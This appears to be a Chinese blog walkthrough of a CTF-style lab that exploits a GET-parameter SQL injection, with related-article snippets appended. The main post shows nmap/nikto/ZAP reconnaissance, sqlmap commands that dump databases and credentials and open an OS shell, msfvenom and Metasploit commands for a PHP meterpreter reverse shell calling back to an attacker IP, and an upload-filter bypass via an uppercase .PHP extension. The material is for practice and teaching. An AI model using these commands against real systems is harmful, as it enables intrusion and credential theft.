SQL注入GET参数

最新推荐文章于 2024-03-07 20:22:13 发布
原创 最新推荐文章于 2024-03-07 20:22:13 发布 · 1.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入探讨了SQL注入攻击原理,包括不当类型处理、不安全数据库配置等产生原因。通过使用Nmap、Nikto和OWASP ZAP等工具进行信息探测、漏洞扫描,详细讲解了如何利用SQLmap进行漏洞利用,最终实现获取服务器权限的过程。

1、SQL注入漏洞介绍

sql注入攻击指的是通过特殊的输入作为参数拆入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句中进而执行攻击者所要的操作,起主要原因是程序没有细致地过滤用户输入的数据,致使非法数据入侵系统。

SQL注入的产生原因通常表现在以下几个方面:①不当的类型处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交处理不当。

2、信息探测

扫描主机服务信息以及服务版本

—nmap -sV 靶场IP地址

快速扫描主机全部信息

–nmap -T4 -A -v 靶场IP地址

探测敏感信息

–nikto -host http://靶场IP地址:端口

3、深入挖掘

分析nmap、nikto扫描结果,并对结果进行分析,挖掘可以利用的信息;

在nikto扫描的结果下,发现用户登录页面的信息

在这里插入图片描述

使用浏览器打开 http://ip:port/敏感页面,查看敏感信息,找到可利用的位置;

在这里插入图片描述
在这里插入图片描述

尝试admin,发现并不能直接登录到系统当中
我们想要进入系统后台,想到能不能来挖掘到系统当中的漏洞

4、漏洞扫描

web漏洞扫描器 owasp-zap(因为这个工具不更新,已经无法在新版本的Kali中运行了。所以被移除了,在命令行执行这个就可以使用了)

在这里插入图片描述

打开owasp-zap

在这里插入图片描述

输入靶场的IP地址,点击攻击(Attack)

在这里插入图片描述
在这里插入图片描述

左下角可以看到深黄色的旗帜,表示存在高危漏洞

5、漏洞利用

针对web进行漏洞扫描

对扫描的结果进行分析。注意:如果具有SQL注入漏洞,可以直接利用。毕竟SQL注入是高危漏洞,可以直接获取服务器权限。

使用sqlmap利用SQL注入漏洞

–sqlmap -u url -dbs 查看数据库名

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

发现两个可以利用的数据库名,information_schema是系统自带的数据库

–sqlmap -u url -D “数据库名” -tables 查看对应数据库中的数据表

在这里插入图片描述

返回photoblog数据库中三个表明

在这里插入图片描述

–sqlmap -u url -D “数据库名” -T “表名” -columns 查看对应字段

在这里插入图片描述

返回表中对应的字段!

在这里插入图片描述

–sqlmap -u url -D “数据库名” -T “表名” -C “列名” -dump 查看对应字段的值

在这里插入图片描述

最后返回用户名密码

在这里插入图片描述

也可以直接尝试 sqlmap -u -url -os -shell 直接获取shell
在获取密码后进行登录

在这里插入图片描述

6、上传shell反弹权限

攻击机启动监听

在这里插入图片描述

生成木马文件
启动监听端

在这里插入图片描述

msf > use exploit/multi/handler
msf exploit(hander) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(hander) > set lhost 攻击机IP地址
msf exploit(hander) > set lport 4444
msf exploit(hander) > run

生成反弹shell

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw > /root/Desktop/shell.php

上传shell执行shell

–绕过过滤机制 利用.php修改为.PHP
最后监听端返回的shell

在这里插入图片描述

7、获取Flag

FXHQAQ
关注
SQL注入详解
渗透之路,攻防之间皆学问
05-05 26万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
6-1CTF夺旗入门教程--SQL注入GET参数
高冷的宅先生
04-05 925
1.SQL注入漏洞介绍 SQL注入产生的原因主要为以下几方面: 不当的类型处理 不安全的数据库配置 不合理的查询集处理 不当的错误处理 不当的转义字符处理 不当的多个提交处理 2.信息探测 #扫描服务器信息及服务版本 nmap -sV 192.168.2.116 #快速扫描靶场全部信息 nmap -T4 -A -v 192.168.2.116 #探测敏感信息 nikto -host...
SQL注入之基于参数类型注入
DM766924的博客
09-10 478
基于联合查询的注入: 1.判断注入点及闭合方式 1)判断闭合方式 闭合方式有很多种,主要有以下几种 无闭合、'、"、')、")、))等情况 2)利用and 1=1 --+ 判断结果 举例 select * from user where id=1 and 1=1 --+ 结果和不加的一致 3)利用and 1=2 --+判断结果 举例 select * from user where id=1 and 1=2 --+ 结果和不加的完全相反 2.判断查询列数及回显位置 order by 数字
CTF练习:SQL注入get参数注入
qq_43233085的博客
11-24 4243
CTF练习:靶场夺旗环境准备信息收集漏洞挖掘sqlmap注入上传shell脚本拿到靶机shell 靶机地址: 链接:https://pan.baidu.com/s/1NEvQD8b_4BUFMv9-gW4L6w 提取码:tqtv 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75.143 查看靶机的IP,为172...
web靶机系列-GET参数注入
rlenew的博客
05-28 562
主机:192.168.136.133 靶机:192.168.136.143 用nmap、dirb扫描靶机 发现有一个网址http://192.168.136.143/admin登陆进去,发现有登陆页面 试用常规的弱口令进行测试发现都不行,转换思路,看看有没有其他漏洞可入侵 用owasp-zap扫描 发现有sql注入 利用sqlmap -u http://192.168.136.143/cat.php?id=3 –dbs 有两个数据库 再用sqlmap -u http://192.168.136.1
SQL注入GET
qq_51393133的博客
09-11 1828
每个数据库都有一个"table_schema"字段,存放的是该数据库的名字。一个数据库有很多表,每个表都有"table_name"字段,存放的是各个表的名字。
SQL注入-GET参数注入
weixin_43850721的博客
01-20 806
CTF练习第一次CTF练习 第一次CTF练习 1.拿到虚拟机后开启 一开始想用外部Xshell连接它,被老冯骂了一顿 2.开启kali用nmap扫描该机器 nmap 192.168.80.135 发现该机器开启了22和80端口 说明该机器开启了ssh和http服务 3.浏览器查看该机器的http服务 http://192.168.80.135 发现网站,有四个页面,前三个是展示界面,第四个是登录界面 尝试登录 4.用burpsuite抓包 尝试进行用户名和密码爆破,失败 失败原因:密码字典不够强大(后面查看
SQL注入GET参数注入(提权版)
2303_76679642的博客
04-23 800
4.使用工具破解密码试试,但是我们没工具(OWASP ZAP),所以得先下载。15.开始运行run,然后将刚刚制作的shell内容复制到/home/kali"目录下的"shell.php"文件里面(没有就新建一个),另注意这个文件的后缀名要写成大写的PHP,因为小写的php会被过滤,无法上传。10.看完数据表之后,再看看表里面的字段,因为第一个数据库里面有很多表,这里就不一一展示,重点来看看第二个数据库表里面的字段:sqlmap -u "目标URL" -D "数据库名" -T "表名" -columns。
DB2数据库SQL注入手册1
08-08
2. 参数化查询:使用参数化查询可以防止SQL注入攻击,因为恶意代码无法被作为参数传递。 3. 访问控制:限制数据库访问权限,以防止未经授权的访问。 常见SQL注入攻击 以下是一些常见的SQL注入攻击: 1. Union攻击...
CTF训练笔记(六)- HTTP服务(SQL注入GET参数注入)(待续)
morrino的博客
04-27 1705
本文介绍了SQL注入get参数注入部分,也介绍了一些渗透测试常用工具及具体使用实例
SQL参数化-防SQL注入
08-30
关于SQL参数化的解释,关于参数化的一些自己的见解,参数化主要是为了防止SQL注入
SqlGET注入
YIGAOYU的博客
04-09 1219
SqlGET注入
sql注入get参数
Vinson的博客
09-27 1370
攻击机192.168.43.61 靶机192.168.43.65 admin弱命令 web漏洞扫描器owasp-zap cross site scripting 高危漏洞 sql注入漏洞,可直接获取服务器权限 使用sqlmap利用sql 注入漏洞 sqlmap -u url --dbs information_schema自带数据库,不用管 sqlma...
sql注入
qq_49714982的博客
04-06 4495
高版本:在MYSQL5.0以上版本存在一个自带数据库为information_schema,它是一个存储所有数据库名、表名、列名的数据库,相当于可以通过查询它获取指定数据库下面的表名、列名信息。id=1 and 1=2 union select 1,database(),user(),4)union select 1,2,3,4(几个列就写到几,并且让?id=1报错,比如id=-1或者 and 1=2)id=-1 union select 1,group_concat(数据项1),3,4 from。
SQL注入-GET型-单参数-时间型盲注
qq_33505576的博客
09-24 372
1、概要 现在的CTF竞赛,WEB类型的题目,SQL注入可以说是必考题,而且,现在的SQL注入题目越来越难了,各种过滤,所以我们的SQL注入神器SQLMAP基本上可以说是没用了,必须要我们自己写脚本和payload进行手工注入,本篇文章以GET型-单参数-时间型盲注为例,总结一下这类题型的做题方法,不喜勿喷。 2、审题 拿到SQL注入的题目,首先要审题,并结合提示看是考察union select注入、报错注入、盲注还是堆叠注入,难题一般都是考察盲注。判断存在什么类型的注入不难,属于基础内容,这里不进一步去展
CTF实验SQL注入GET参数
floyd_art的博客
03-30 822
SQL注入漏洞介绍 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。   SQL注入的产生原因通常表现在以下几方面:①不当的类型处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交...
SQl注入常见参数
weixin_30409849的博客
07-01 1085
SQL注入常见参数 user(): 数据库用户,格式为user() @server database(): 当前数据库名称。 version(): 当前数据版本,例如5.x.x-n1等......... @@datadir: 数据库路径。通常用于load_file时猜测网站路径等。例如:c:\xxxx\xxxxx...
SQL注入总结 附带sqlmap使用参数
weixin_52206305的博客
03-07 1350
SQL注入漏洞(SQLinjection)是Web层面最高危的漏洞之一。在2008年至2010年期间,SQL注入漏洞连续3年在OWASP年度十大漏洞排行中排名第一。在2005年前后,SQL注入漏洞到处可见,在用户登录或者搜索时,只需要输入一个单引号就可以检测出这种漏洞。随着Web应用程序的安全性不断提高,SQL注入漏洞逐渐减少,同时也变得更加难以检测与利用。
SQL注入--get注入
weixin_52151447的博客
11-11 2600
SQL注入--get注入 get为网页传参方式,常见的传参方式有GET、POST传参; GET与POST传参方式主要的区别在于,GET方式请求传参时,参数会在URL中显示,而POST没有显示; 注入:用户输入的字符被当做代码执行; 注入方法: 1、判断页面中是否存在注入 and 1=2 ,查询结果报错说明语句当做代码被执行; 2、判断数据表中字段 order by 4显示错误,故有3个字段; 3、查找显错位 and 1=2 union select 1,2,3 ...
sql注入GET参数
最新发布
06-21
### 通过GET参数进行SQL注入攻击与防御方法 #### SQL注入攻击原理 SQL注入是一种安全漏洞,攻击者可以通过输入恶意的SQL代码来操纵数据库查询。当应用程序未对用户输入进行有效验证或转义时,攻击者可以利用GET请求中的参数注入恶意SQL语句[^1]。 #### 攻击示例 假设一个Web应用通过GET请求获取用户ID并查询数据库,其代码可能如下所示: ```php <?php $user_id = $_GET['id']; $sql = "SELECT * FROM users WHERE id = $user_id"; $result = mysqli_query($conn, $sql); ?> ``` 如果攻击者构造如下URL:`http://example.com/user.php?id=1 OR 1=1`,生成的SQL语句将变为: ```sql SELECT * FROM users WHERE id = 1 OR 1=1; ``` 这会导致查询返回所有用户的记录[^2]。 #### 防御方法 ##### 1. 参数化查询 使用参数化查询可以有效防止SQL注入。以下是PHP中使用PDO的示例: ```php <?php $stmt = $pdo->prepare('SELECT * FROM users WHERE id = :id'); $stmt->execute(['id' => $_GET['id']]); $result = $stmt->fetchAll(); ?> ``` 通过绑定参数,确保用户输入不会被直接嵌入到SQL语句中。 ##### 2. 输入验证 对GET参数进行严格的输入验证,确保其符合预期格式。例如,如果`id`应为整数,则可以使用以下代码: ```php <?php if (isset($_GET['id']) && ctype_digit($_GET['id'])) { $user_id = intval($_GET['id']); } else { die('Invalid input'); } ?> ``` 此方法可以过滤掉非法输入[^3]。 ##### 3. 使用ORM框架 ORM(对象关系映射)框架能够自动处理SQL查询的安全性问题。例如,在Python的Django框架中: ```python user = User.objects.get(id=user_id) ``` ORM会自动对参数进行转义和验证[^4]。 ##### 4. 最小权限原则 限制数据库用户的权限,避免其拥有不必要的操作权限。例如,仅授予`SELECT`、`INSERT`和`UPDATE`权限,而禁用`DROP`和`CREATE`等高危操作[^5]。 ##### 5. 输出编码与日志监控 对输出数据进行HTML编码以防止XSS攻击,并启用日志监控系统以检测异常查询行为[^4]。 ### 总结 通过GET参数进行SQL注入攻击的关键在于未验证或未转义的用户输入。防御措施包括使用参数化查询、严格输入验证、采用ORM框架、实施最小权限原则以及加强日志监控。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值